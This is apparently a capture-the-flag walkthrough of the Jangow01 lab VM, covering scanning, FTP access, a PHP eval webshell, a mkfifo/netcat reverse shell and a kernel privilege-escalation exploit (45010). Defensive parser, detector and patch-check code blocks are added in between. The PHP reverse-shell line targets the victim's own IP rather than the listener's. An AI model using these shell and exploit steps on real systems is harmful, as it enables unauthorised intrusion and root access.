Information gathering
1. ARP discovery
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1 00:50:56:c0:00:08 VMware, Inc.
192.168.16.2 00:50:56:e6:0b:60 VMware, Inc.
192.168.16.129 00:0c:29:66:12:08 VMware, Inc.
192.168.16.254 00:50:56:e6:5c:c0 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.361 seconds (108.43 hosts/sec). 4 responded
2. netdiscover
The netdiscover tool
Currently scanning: 172.26.56.0/16 | Screen View: Unique Hosts
37 Captured ARP Req/Rep packets, from 4 hosts. Total size: 2220
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.16.1 00:50:56:c0:00:08 33 1980 VMware, Inc.
192.168.16.2 00:50:56:e6:0b:60 2 120 VMware, Inc.
192.168.16.129 00:0c:29:66:12:08 1 60 VMware, Inc.
192.168.16.254 00:50:56:e6:5c:c0 1 60 VMware, Inc.
3. nmap scan
Port scan
└─# nmap -p- 192.168.16.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-12 12:25 CST
Nmap scan report for 192.168.16.129
Host is up (0.00022s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 00:0C:29:66:12:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 104.69 seconds
┌──(root㉿ru)-[~/lianxi]
└─# cat xx.nmap
# Nmap 7.94 scan initiated Thu Oct 12 12:29:48 2023 as: nmap -sS -sC -sV -A -T4 -p 21,80 -oA /root/lianxi/xx 192.168.16.129
Nmap scan report for 192.168.16.129
Host is up (0.00019s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:66:12:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.19 ms 192.168.16.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 12 12:30:04 2023 -- 1 IP address (1 host up) scanned in 15.33 seconds
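Added example (not part of the original write-up): a small Python parser for the normal-format nmap output shown above. It pulls the target host and each port line into structured records and then flags open services whose protocol normally carries credentials unencrypted, which is the first thing to review on an inventory like this (FTP on 21, plain HTTP on 80). The sample text is constructed from the scan above; the set of cleartext-auth services is an assumption, not something the page states.

```python
import re

# Constructed sample: the port section of the `cat xx.nmap` output shown above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.16.129
Host is up (0.00019s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:66:12:08 (VMware)
"""

# One port line of nmap normal (-oN) output: "21/tcp open ftp vsftpd 3.0.3"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)
TARGET_LINE = re.compile(r"^Nmap scan report for (\S+)")

# Services whose usual protocol sends credentials unencrypted (assumed list, not from the page).
CLEARTEXT_AUTH = {"ftp", "telnet", "pop3", "imap", "http"}


def scan_target(text):
    """Return the host named in the 'Nmap scan report for ...' line, or None."""
    for line in text.splitlines():
        m = TARGET_LINE.match(line)
        if m:
            return m.group(1)
    return None


def parse_nmap_ports(text):
    """Return one dict per port line: port, proto, state, service, version."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # headers, script output (|_...), the MAC line etc. are skipped
        entry = m.groupdict()
        entry["port"] = int(entry["port"])
        entry["version"] = (entry["version"] or "").strip()
        ports.append(entry)
    return ports


def cleartext_auth_services(ports):
    """Open ports whose service normally carries credentials in the clear."""
    return [p for p in ports if p["state"] == "open" and p["service"] in CLEARTEXT_AUTH]


if __name__ == "__main__":
    found = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    print("target:", scan_target(SAMPLE_NMAP_OUTPUT))
    for p in found:
        print(f"{p['port']}/{p['proto']} {p['state']} {p['service']} {p['version']}")
    for p in cleartext_auth_services(found):
        print(f"review: {p['service']} on {p['port']}/{p['proto']} sends credentials unencrypted")
```

Feed it the saved `.nmap` file instead of the sample and the same functions work on a whole host list; anything that is not a port line is ignored rather than breaking the parse.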
4. Directory scan
dirb
┌──(root㉿ru)-[~/lianxi]
└─# dirb http://192.168.16.129:80 -w php,txt,html,js,sh
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 12 13:55:01 2023
URL_BASE: http://192.168.16.129:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.16.129:80/ ----
+ http://192.168.16.129:80/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.16.129:80/site/
---- Entering directory: http://192.168.16.129:80/site/ ----
==> DIRECTORY: http://192.168.16.129:80/site/assets/
==> DIRECTORY: http://192.168.16.129:80/site/css/
+ http://192.168.16.129:80/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.16.129:80/site/js/
==> DIRECTORY: http://192.168.16.129:80/site/wordpress/
---- Entering directory: http://192.168.16.129:80/site/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.16.129:80/site/assets/favicon.ico (CODE:200|SIZE:23462)
==> DIRECTORY: http://192.168.16.129:80/site/assets/img/
---- Entering directory: http://192.168.16.129:80/site/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.16.129:80/site/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.16.129:80/site/wordpress/ ----
+ http://192.168.16.129:80/site/wordpress/index.html (CODE:200|SIZE:10190)
---- Entering directory: http://192.168.16.129:80/site/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Oct 12 14:00:43 2023
DOWNLOADED: 32284 - FOUND: 4
dirsearch
┌──(root㉿ru)-[~]
└─# dirsearch -u http://192.168.16.129:80 -e*
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/.dirsearch/reports/192.168.16.129-80/_23-10-12_13-55-02.txt
Error Log: /root/.dirsearch/logs/errors-23-10-12_13-55-02.log
Target: http://192.168.16.129:80/
[13:55:02] Starting:
[13:55:03] 200 - 336B - /.backup
[13:55:03] 403 - 279B - /.ht_wsr.txt
[13:55:03] 403 - 279B - /.htaccess.bak1
[13:55:04] 403 - 279B - /.htaccess.sample
[13:55:04] 403 - 279B - /.htaccess_orig
[13:55:04] 403 - 279B - /.htaccess_extra
[13:55:04] 403 - 279B - /.htaccess.orig
[13:55:04] 403 - 279B - /.htaccess_sc
[13:55:04] 403 - 279B - /.htaccessOLD
[13:55:04] 403 - 279B - /.htaccess.save
[13:55:04] 403 - 279B - /.htaccessBAK
[13:55:04] 403 - 279B - /.htaccessOLD2
[13:55:04] 403 - 279B - /.htm
[13:55:04] 403 - 279B - /.html
[13:55:04] 403 - 279B - /.httr-oauth
[13:55:04] 403 - 279B - /.htpasswds
[13:55:04] 403 - 279B - /.htpasswd_test
[13:55:04] 403 - 279B - /.php3
[13:55:04] 403 - 279B - /.php
[13:55:34] 403 - 279B - /server-status
[13:55:34] 403 - 279B - /server-status/
[13:55:36] 301 - 315B - /site -> http://192.168.16.129/site/
[13:55:36] 200 - 10KB - /site/
Task Completed
gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.16.129:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,js,sh
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/site (Status: 301) [Size: 315] [--> http://192.168.16.129/site/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
==============================================================
feroxbuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# feroxbuster -u http://192.168.16.129:80 -x php,txt,html,js,sh -w directory-list-lowercase-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.16.129:80
🚀 Threads │ 50
📖 Wordlist │ directory-list-lowercase-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, html, js, sh]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 315c http://192.168.16.129/site => http://192.168.16.129/site/
200 GET 106l 659w 26989c http://192.168.16.129/site/assets/img/demo-image-01.jpg
200 GET 54l 134w 1644c http://192.168.16.129/site/js/scripts.js
200 GET 492l 2733w 186437c http://192.168.16.129/site/assets/img/demo-image-02.jpg
200 GET 1l 0w 1c http://192.168.16.129/site/busque.php
200 GET 949l 4824w 385662c http://192.168.16.129/site/assets/img/bg-masthead.jpg
200 GET 8l 29w 28898c http://192.168.16.129/site/assets/favicon.ico
200 GET 11253l 21663w 207746c http://192.168.16.129/site/css/styles.css
200 GET 679l 4637w 425261c http://192.168.16.129/site/assets/img/ipad.png
200 GET 173l 663w 10190c http://192.168.16.129/site/index.html
200 GET 2608l 13994w 956051c http://192.168.16.129/site/assets/img/bg-signup.jpg
301 GET 9l 28w 322c http://192.168.16.129/site/assets => http://192.168.16.129/site/assets/
301 GET 9l 28w 319c http://192.168.16.129/site/css => http://192.168.16.129/site/css/
301 GET 9l 28w 325c http://192.168.16.129/site/wordpress => http://192.168.16.129/site/wordpress/
200 GET 1l 1w 2c http://192.168.16.129/site/123.php
200 GET 173l 663w 10190c http://192.168.16.129/site/wordpress/index.html
301 GET 9l 28w 318c http://192.168.16.129/site/js => http://192.168.16.129/site/js/
200 GET 1l 10w 87c http://192.168.16.129/site/wordpress/config.php
200 GET 44l 346w 26169c http://192.168.16.129/site/exp
[####################] - 5m 2491854/2491854 0s found:19 errors:1
[####################] - 0s 1245774/1245774 73280824/s http://192.168.16.129:80/ => Directory listing
[####################] - 5m 1245774/1245774 4008/s http://192.168.16.129/site/
[####################] - 0s 1245774/1245774 4847370/s http://192.168.16.129/site/assets/ => Directory listing
[####################] - 0s 1245774/1245774 6591397/s http://192.168.16.129/site/js/ => Directory listing
[####################] - 1s 1245774/1245774 1338103/s http://192.168.16.129/site/assets/img/ => Directory listing
[####################] - 1s 1245774/1245774 1832021/s http://192.168.16.129/site/css/ => Directory listing
[####################] - 5m 1245774/1245774 3986/s http://192.168.16.129/site/wordpress/
WEB
1. Port 80
2. Port 21
┌──(root㉿ru)-[~/lianxi]
└─# ftp
ftp> open 192.168.16.129
Connected to 192.168.16.129.
220 (vsFTPd 3.0.3)
Name (192.168.16.129:root): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||17403|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 14 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> pwd
Remote directory: /var/www
ftp> cd home
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||27583|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 jangow01
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||12012|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
-rw------- 1 1000 1000 200 Oct 31 2021 .bash_history
-rw-r--r-- 1 1000 1000 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Jun 10 2021 .bashrc
drwx------ 2 1000 1000 4096 Jun 10 2021 .cache
drwxrwxr-x 2 1000 1000 4096 Jun 10 2021 .nano
-rw-r--r-- 1 1000 1000 655 Jun 10 2021 .profile
-rw-r--r-- 1 1000 1000 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
226 Directory send OK.
ftp> cat user.txt
?Invalid command.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||33573|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*******************************************************************************************| 33 5.12 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (4.60 KiB/s)
ftp>
zsh: suspended ftp
┌──(root㉿ru)-[~/lianxi]
└─# ls
port.gnmap port.nmap port.xml user.txt xx.gnmap xx.nmap xx.xml
┌──(root㉿ru)-[~/lianxi]
└─# cat user.txt
d41d8cd98f00b204e9800998ecf8427e (first flag)
SSH login
1. Writing a shell
Use the page that has the RCE to get a reverse shell:
echo '<?php echo "OK!";eval($_POST[cmd]); ?>' >shell.php
URL-encoded:
echo%20'%3C%3Fphp%20echo%20%22OK%EF%BC%81%22%3Beval(%24_POST%5Bcmd%5D)%3B%20%3F%3E'%20%3E987.php
Then connect to it with AntSword (蚁剑).
2. Reverse shell
In /etc/ssh/ssh_config on the target we found that port 22 is enabled, yet the scanners did not detect it, which means it is probably being blocked or restricted by a firewall; so for the reverse shell we need a specially crafted shell script.
# This is the ssh client system-wide configuration file. See
# ssh_config(5) for more information. This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.
# Configuration data is parsed as follows:
# 1. command line options
# 2. user-specific file
# 3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.
# Site-wide defaults for some commonly used options. For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.
Host *
# ForwardAgent no
# ForwardX11 no
# ForwardX11Trusted yes
# RhostsRSAAuthentication no
# RSAAuthentication yes
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# GSSAPIKeyExchange no
# GSSAPITrustDNS no
# BatchMode no
# CheckHostIP yes
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Protocol 2
# Cipher 3des
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
Use the mkfifo command to create a named pipe for the reverse shell
Syntax:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f
<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.129 443 >/tmp/f");?>
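Added example from the defender's side (not code from the original write-up): a detector for the two artefacts this section leaves on the target, the one-line PHP shell written in step 1 and the mkfifo named-pipe reverse shell above. It checks PHP sources under the web root for request parameters fed straight into eval()/system()-style calls, and checks process command lines for the mkfifo ... | sh -i ... | nc host port pipeline. The file contents and process records are constructed samples (file names follow the listing on the page, everything else is made up); the pattern list is an assumption and only covers what this page shows.

```python
import re

# Constructed samples: the one-line PHP shell and the mkfifo pipeline from the
# write-up above, placed beside benign content so the detector has something to separate.
PHP_FILES = {
    "/var/www/html/site/987.php": '<?php echo "OK!";eval($_POST[cmd]); ?>',
    "/var/www/html/site/ffshell.php":
        '<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.129 443 >/tmp/f");?>',
    "/var/www/html/site/wordpress/config.php": '<?php $db_host = "localhost"; ?>',
    "/var/www/html/site/hello.php": '<?php echo "<h1>Welcome</h1>"; ?>',
}

# Constructed process records in "user pid command" form (e.g. from `ps -eo user,pid,args`).
PROCESS_LOG = [
    "www-data 1201 /bin/sh -c mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.129 443 >/tmp/f",
    "www-data 1100 /usr/sbin/apache2 -k start",
    "root 1 /sbin/init",
]

WEBSHELL_PATTERNS = [
    # code or command execution fed directly from a request parameter
    re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    re.compile(r"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
]

REVERSE_SHELL_PATTERNS = [
    # named-pipe reverse shell: mkfifo <pipe> ... | sh -i ... | nc <host> <port>
    re.compile(r"mkfifo\s+\S+.*\|\s*(?:/bin/)?(?:ba)?sh\s+-i.*\|\s*(?:nc|ncat|netcat)\s+\S+\s+\d+", re.I),
]


def classify(text):
    """Labels for one piece of text: 'webshell', 'reverse-shell', both, or none."""
    labels = []
    if any(p.search(text) for p in WEBSHELL_PATTERNS):
        labels.append("webshell")
    if any(p.search(text) for p in REVERSE_SHELL_PATTERNS):
        labels.append("reverse-shell")
    return labels


def scan_php_files(files):
    """Map path -> labels for every file that matched at least one pattern."""
    hits = {}
    for path, source in files.items():
        labels = classify(source)
        if labels:
            hits[path] = labels
    return hits


def scan_process_log(lines):
    """Process records whose command line looks like a named-pipe reverse shell."""
    return [line for line in lines if "reverse-shell" in classify(line)]


if __name__ == "__main__":
    for path, labels in scan_php_files(PHP_FILES).items():
        print(f"{path}: {', '.join(labels)}")
    for record in scan_process_log(PROCESS_LOG):
        print(f"process: {record}")
```

On a real host the file scan would walk the document root (here /var/www/html) and the process scan would run over `ps` output or an auditd execve log; the same classify() serves both, which is why the pipeline regex is kept independent of the PHP wrapper around it. A web server account spawning sh and nc, as in the first process record, is the signal worth alerting on regardless of what the file is called.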
┌──(root㉿ru)-[~/lianxi]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.16.129: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.129] 37342
/bin/sh: 0: can't access tty; job control turned off
$ whereis python
python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ pwd
pwd
/var/www/html/site
www-data@jangow01:/var/www/html/site$ uname -a
uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
www-data@jangow01:/var/www/html/site$
Privilege escalation
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 4.4.0-31
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Esca | windows_x86-64/local/47170.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escal | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04.1
---------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | linux/local/40489.txt
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Ubuntu 16.04
---------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack C | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escala | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Es | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SME | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Esc | linux/local/47169.c
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 45010.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /root/lianxi/45010.c
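Added example (not from the original write-up): a patch-status check that compares the kernel the target reported via `uname -a` (4.4.0-31-generic) against the "vulnerable below" versions stated in the searchsploit titles above. The thresholds are copied from those titles; the parsing of "major.minor.patch-abi" and the rule that a build number can only be compared against another build number on the same upstream base are my assumptions about how to read them, not something the page spells out.

```python
import re

# Constructed sample: the kernel string the target reported via `uname -a` above.
TARGET_KERNEL = "4.4.0-31-generic"

# "Vulnerable below" thresholds copied from the searchsploit titles shown above.
# 45010 states an upstream version; the other two state Ubuntu build (ABI) numbers.
ADVISORIES = [
    {"edb": "45010", "title": "Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)", "below": "4.13.9"},
    {"edb": "44298", "title": "Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4)", "below": "4.4.0-116"},
    {"edb": "43418", "title": "Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04)", "below": "4.4.0-83"},
]

# major.minor[.patch][-abi]; any trailing flavour such as "-generic" is ignored
KERNEL_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(\d+))?")


def parse_kernel(version):
    """'4.4.0-31-generic' -> ((4, 4, 0), 31); '4.13.9' -> ((4, 13, 9), None)."""
    m = KERNEL_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised kernel version: {version!r}")
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch or 0)), (int(abi) if abi else None)


def is_below(running, threshold):
    """True if `running` is older than `threshold` in a way the two strings can express."""
    run_up, run_abi = parse_kernel(running)
    thr_up, thr_abi = parse_kernel(threshold)
    if run_up != thr_up:
        return run_up < thr_up
    # Same upstream base: only a build number on both sides can decide;
    # with one side missing we report "not below" instead of guessing.
    if run_abi is None or thr_abi is None:
        return False
    return run_abi < thr_abi


def matching_advisories(running, advisories=ADVISORIES):
    """EDB ids whose threshold the running kernel falls below."""
    return [a["edb"] for a in advisories if is_below(running, a["below"])]


if __name__ == "__main__":
    for kernel in (TARGET_KERNEL, "4.4.0-210-generic"):
        print(kernel, "->", matching_advisories(kernel) or "nothing flagged")
```

Against the target's 4.4.0-31 all three entries are flagged. Against a hypothetical later 4.4.0-210 build only 45010 stays flagged, because its threshold is an upstream version and Ubuntu backports security fixes into its 4.4.0-xxx series without changing the upstream number; an upstream-only comparison is therefore a prompt to check the distribution's own advisory, not proof that the host is exposed, while the build-number thresholds are the ones a patch-management check can act on directly.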
Then drop the PoC onto the target through AntSword and carry on with the next steps.
www-data@jangow01:/var/www/html/site$ ls
ls
45010.c assets css index.html wordpress
987.php busque.php ffshell.php js
www-data@jangow01:/var/www/html/site$ gcc 45010.c -o exp   // compile
gcc 45010.c -o exp
www-data@jangow01:/var/www/html/site$ ls
ls
45010.c assets css ffshell.php js
987.php busque.php exp index.html wordpress
www-data@jangow01:/var/www/html/site$ chmod +x exp   // grant execute permission
chmod +x exp
www-data@jangow01:/var/www/html/site$ ./exp
./exp
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
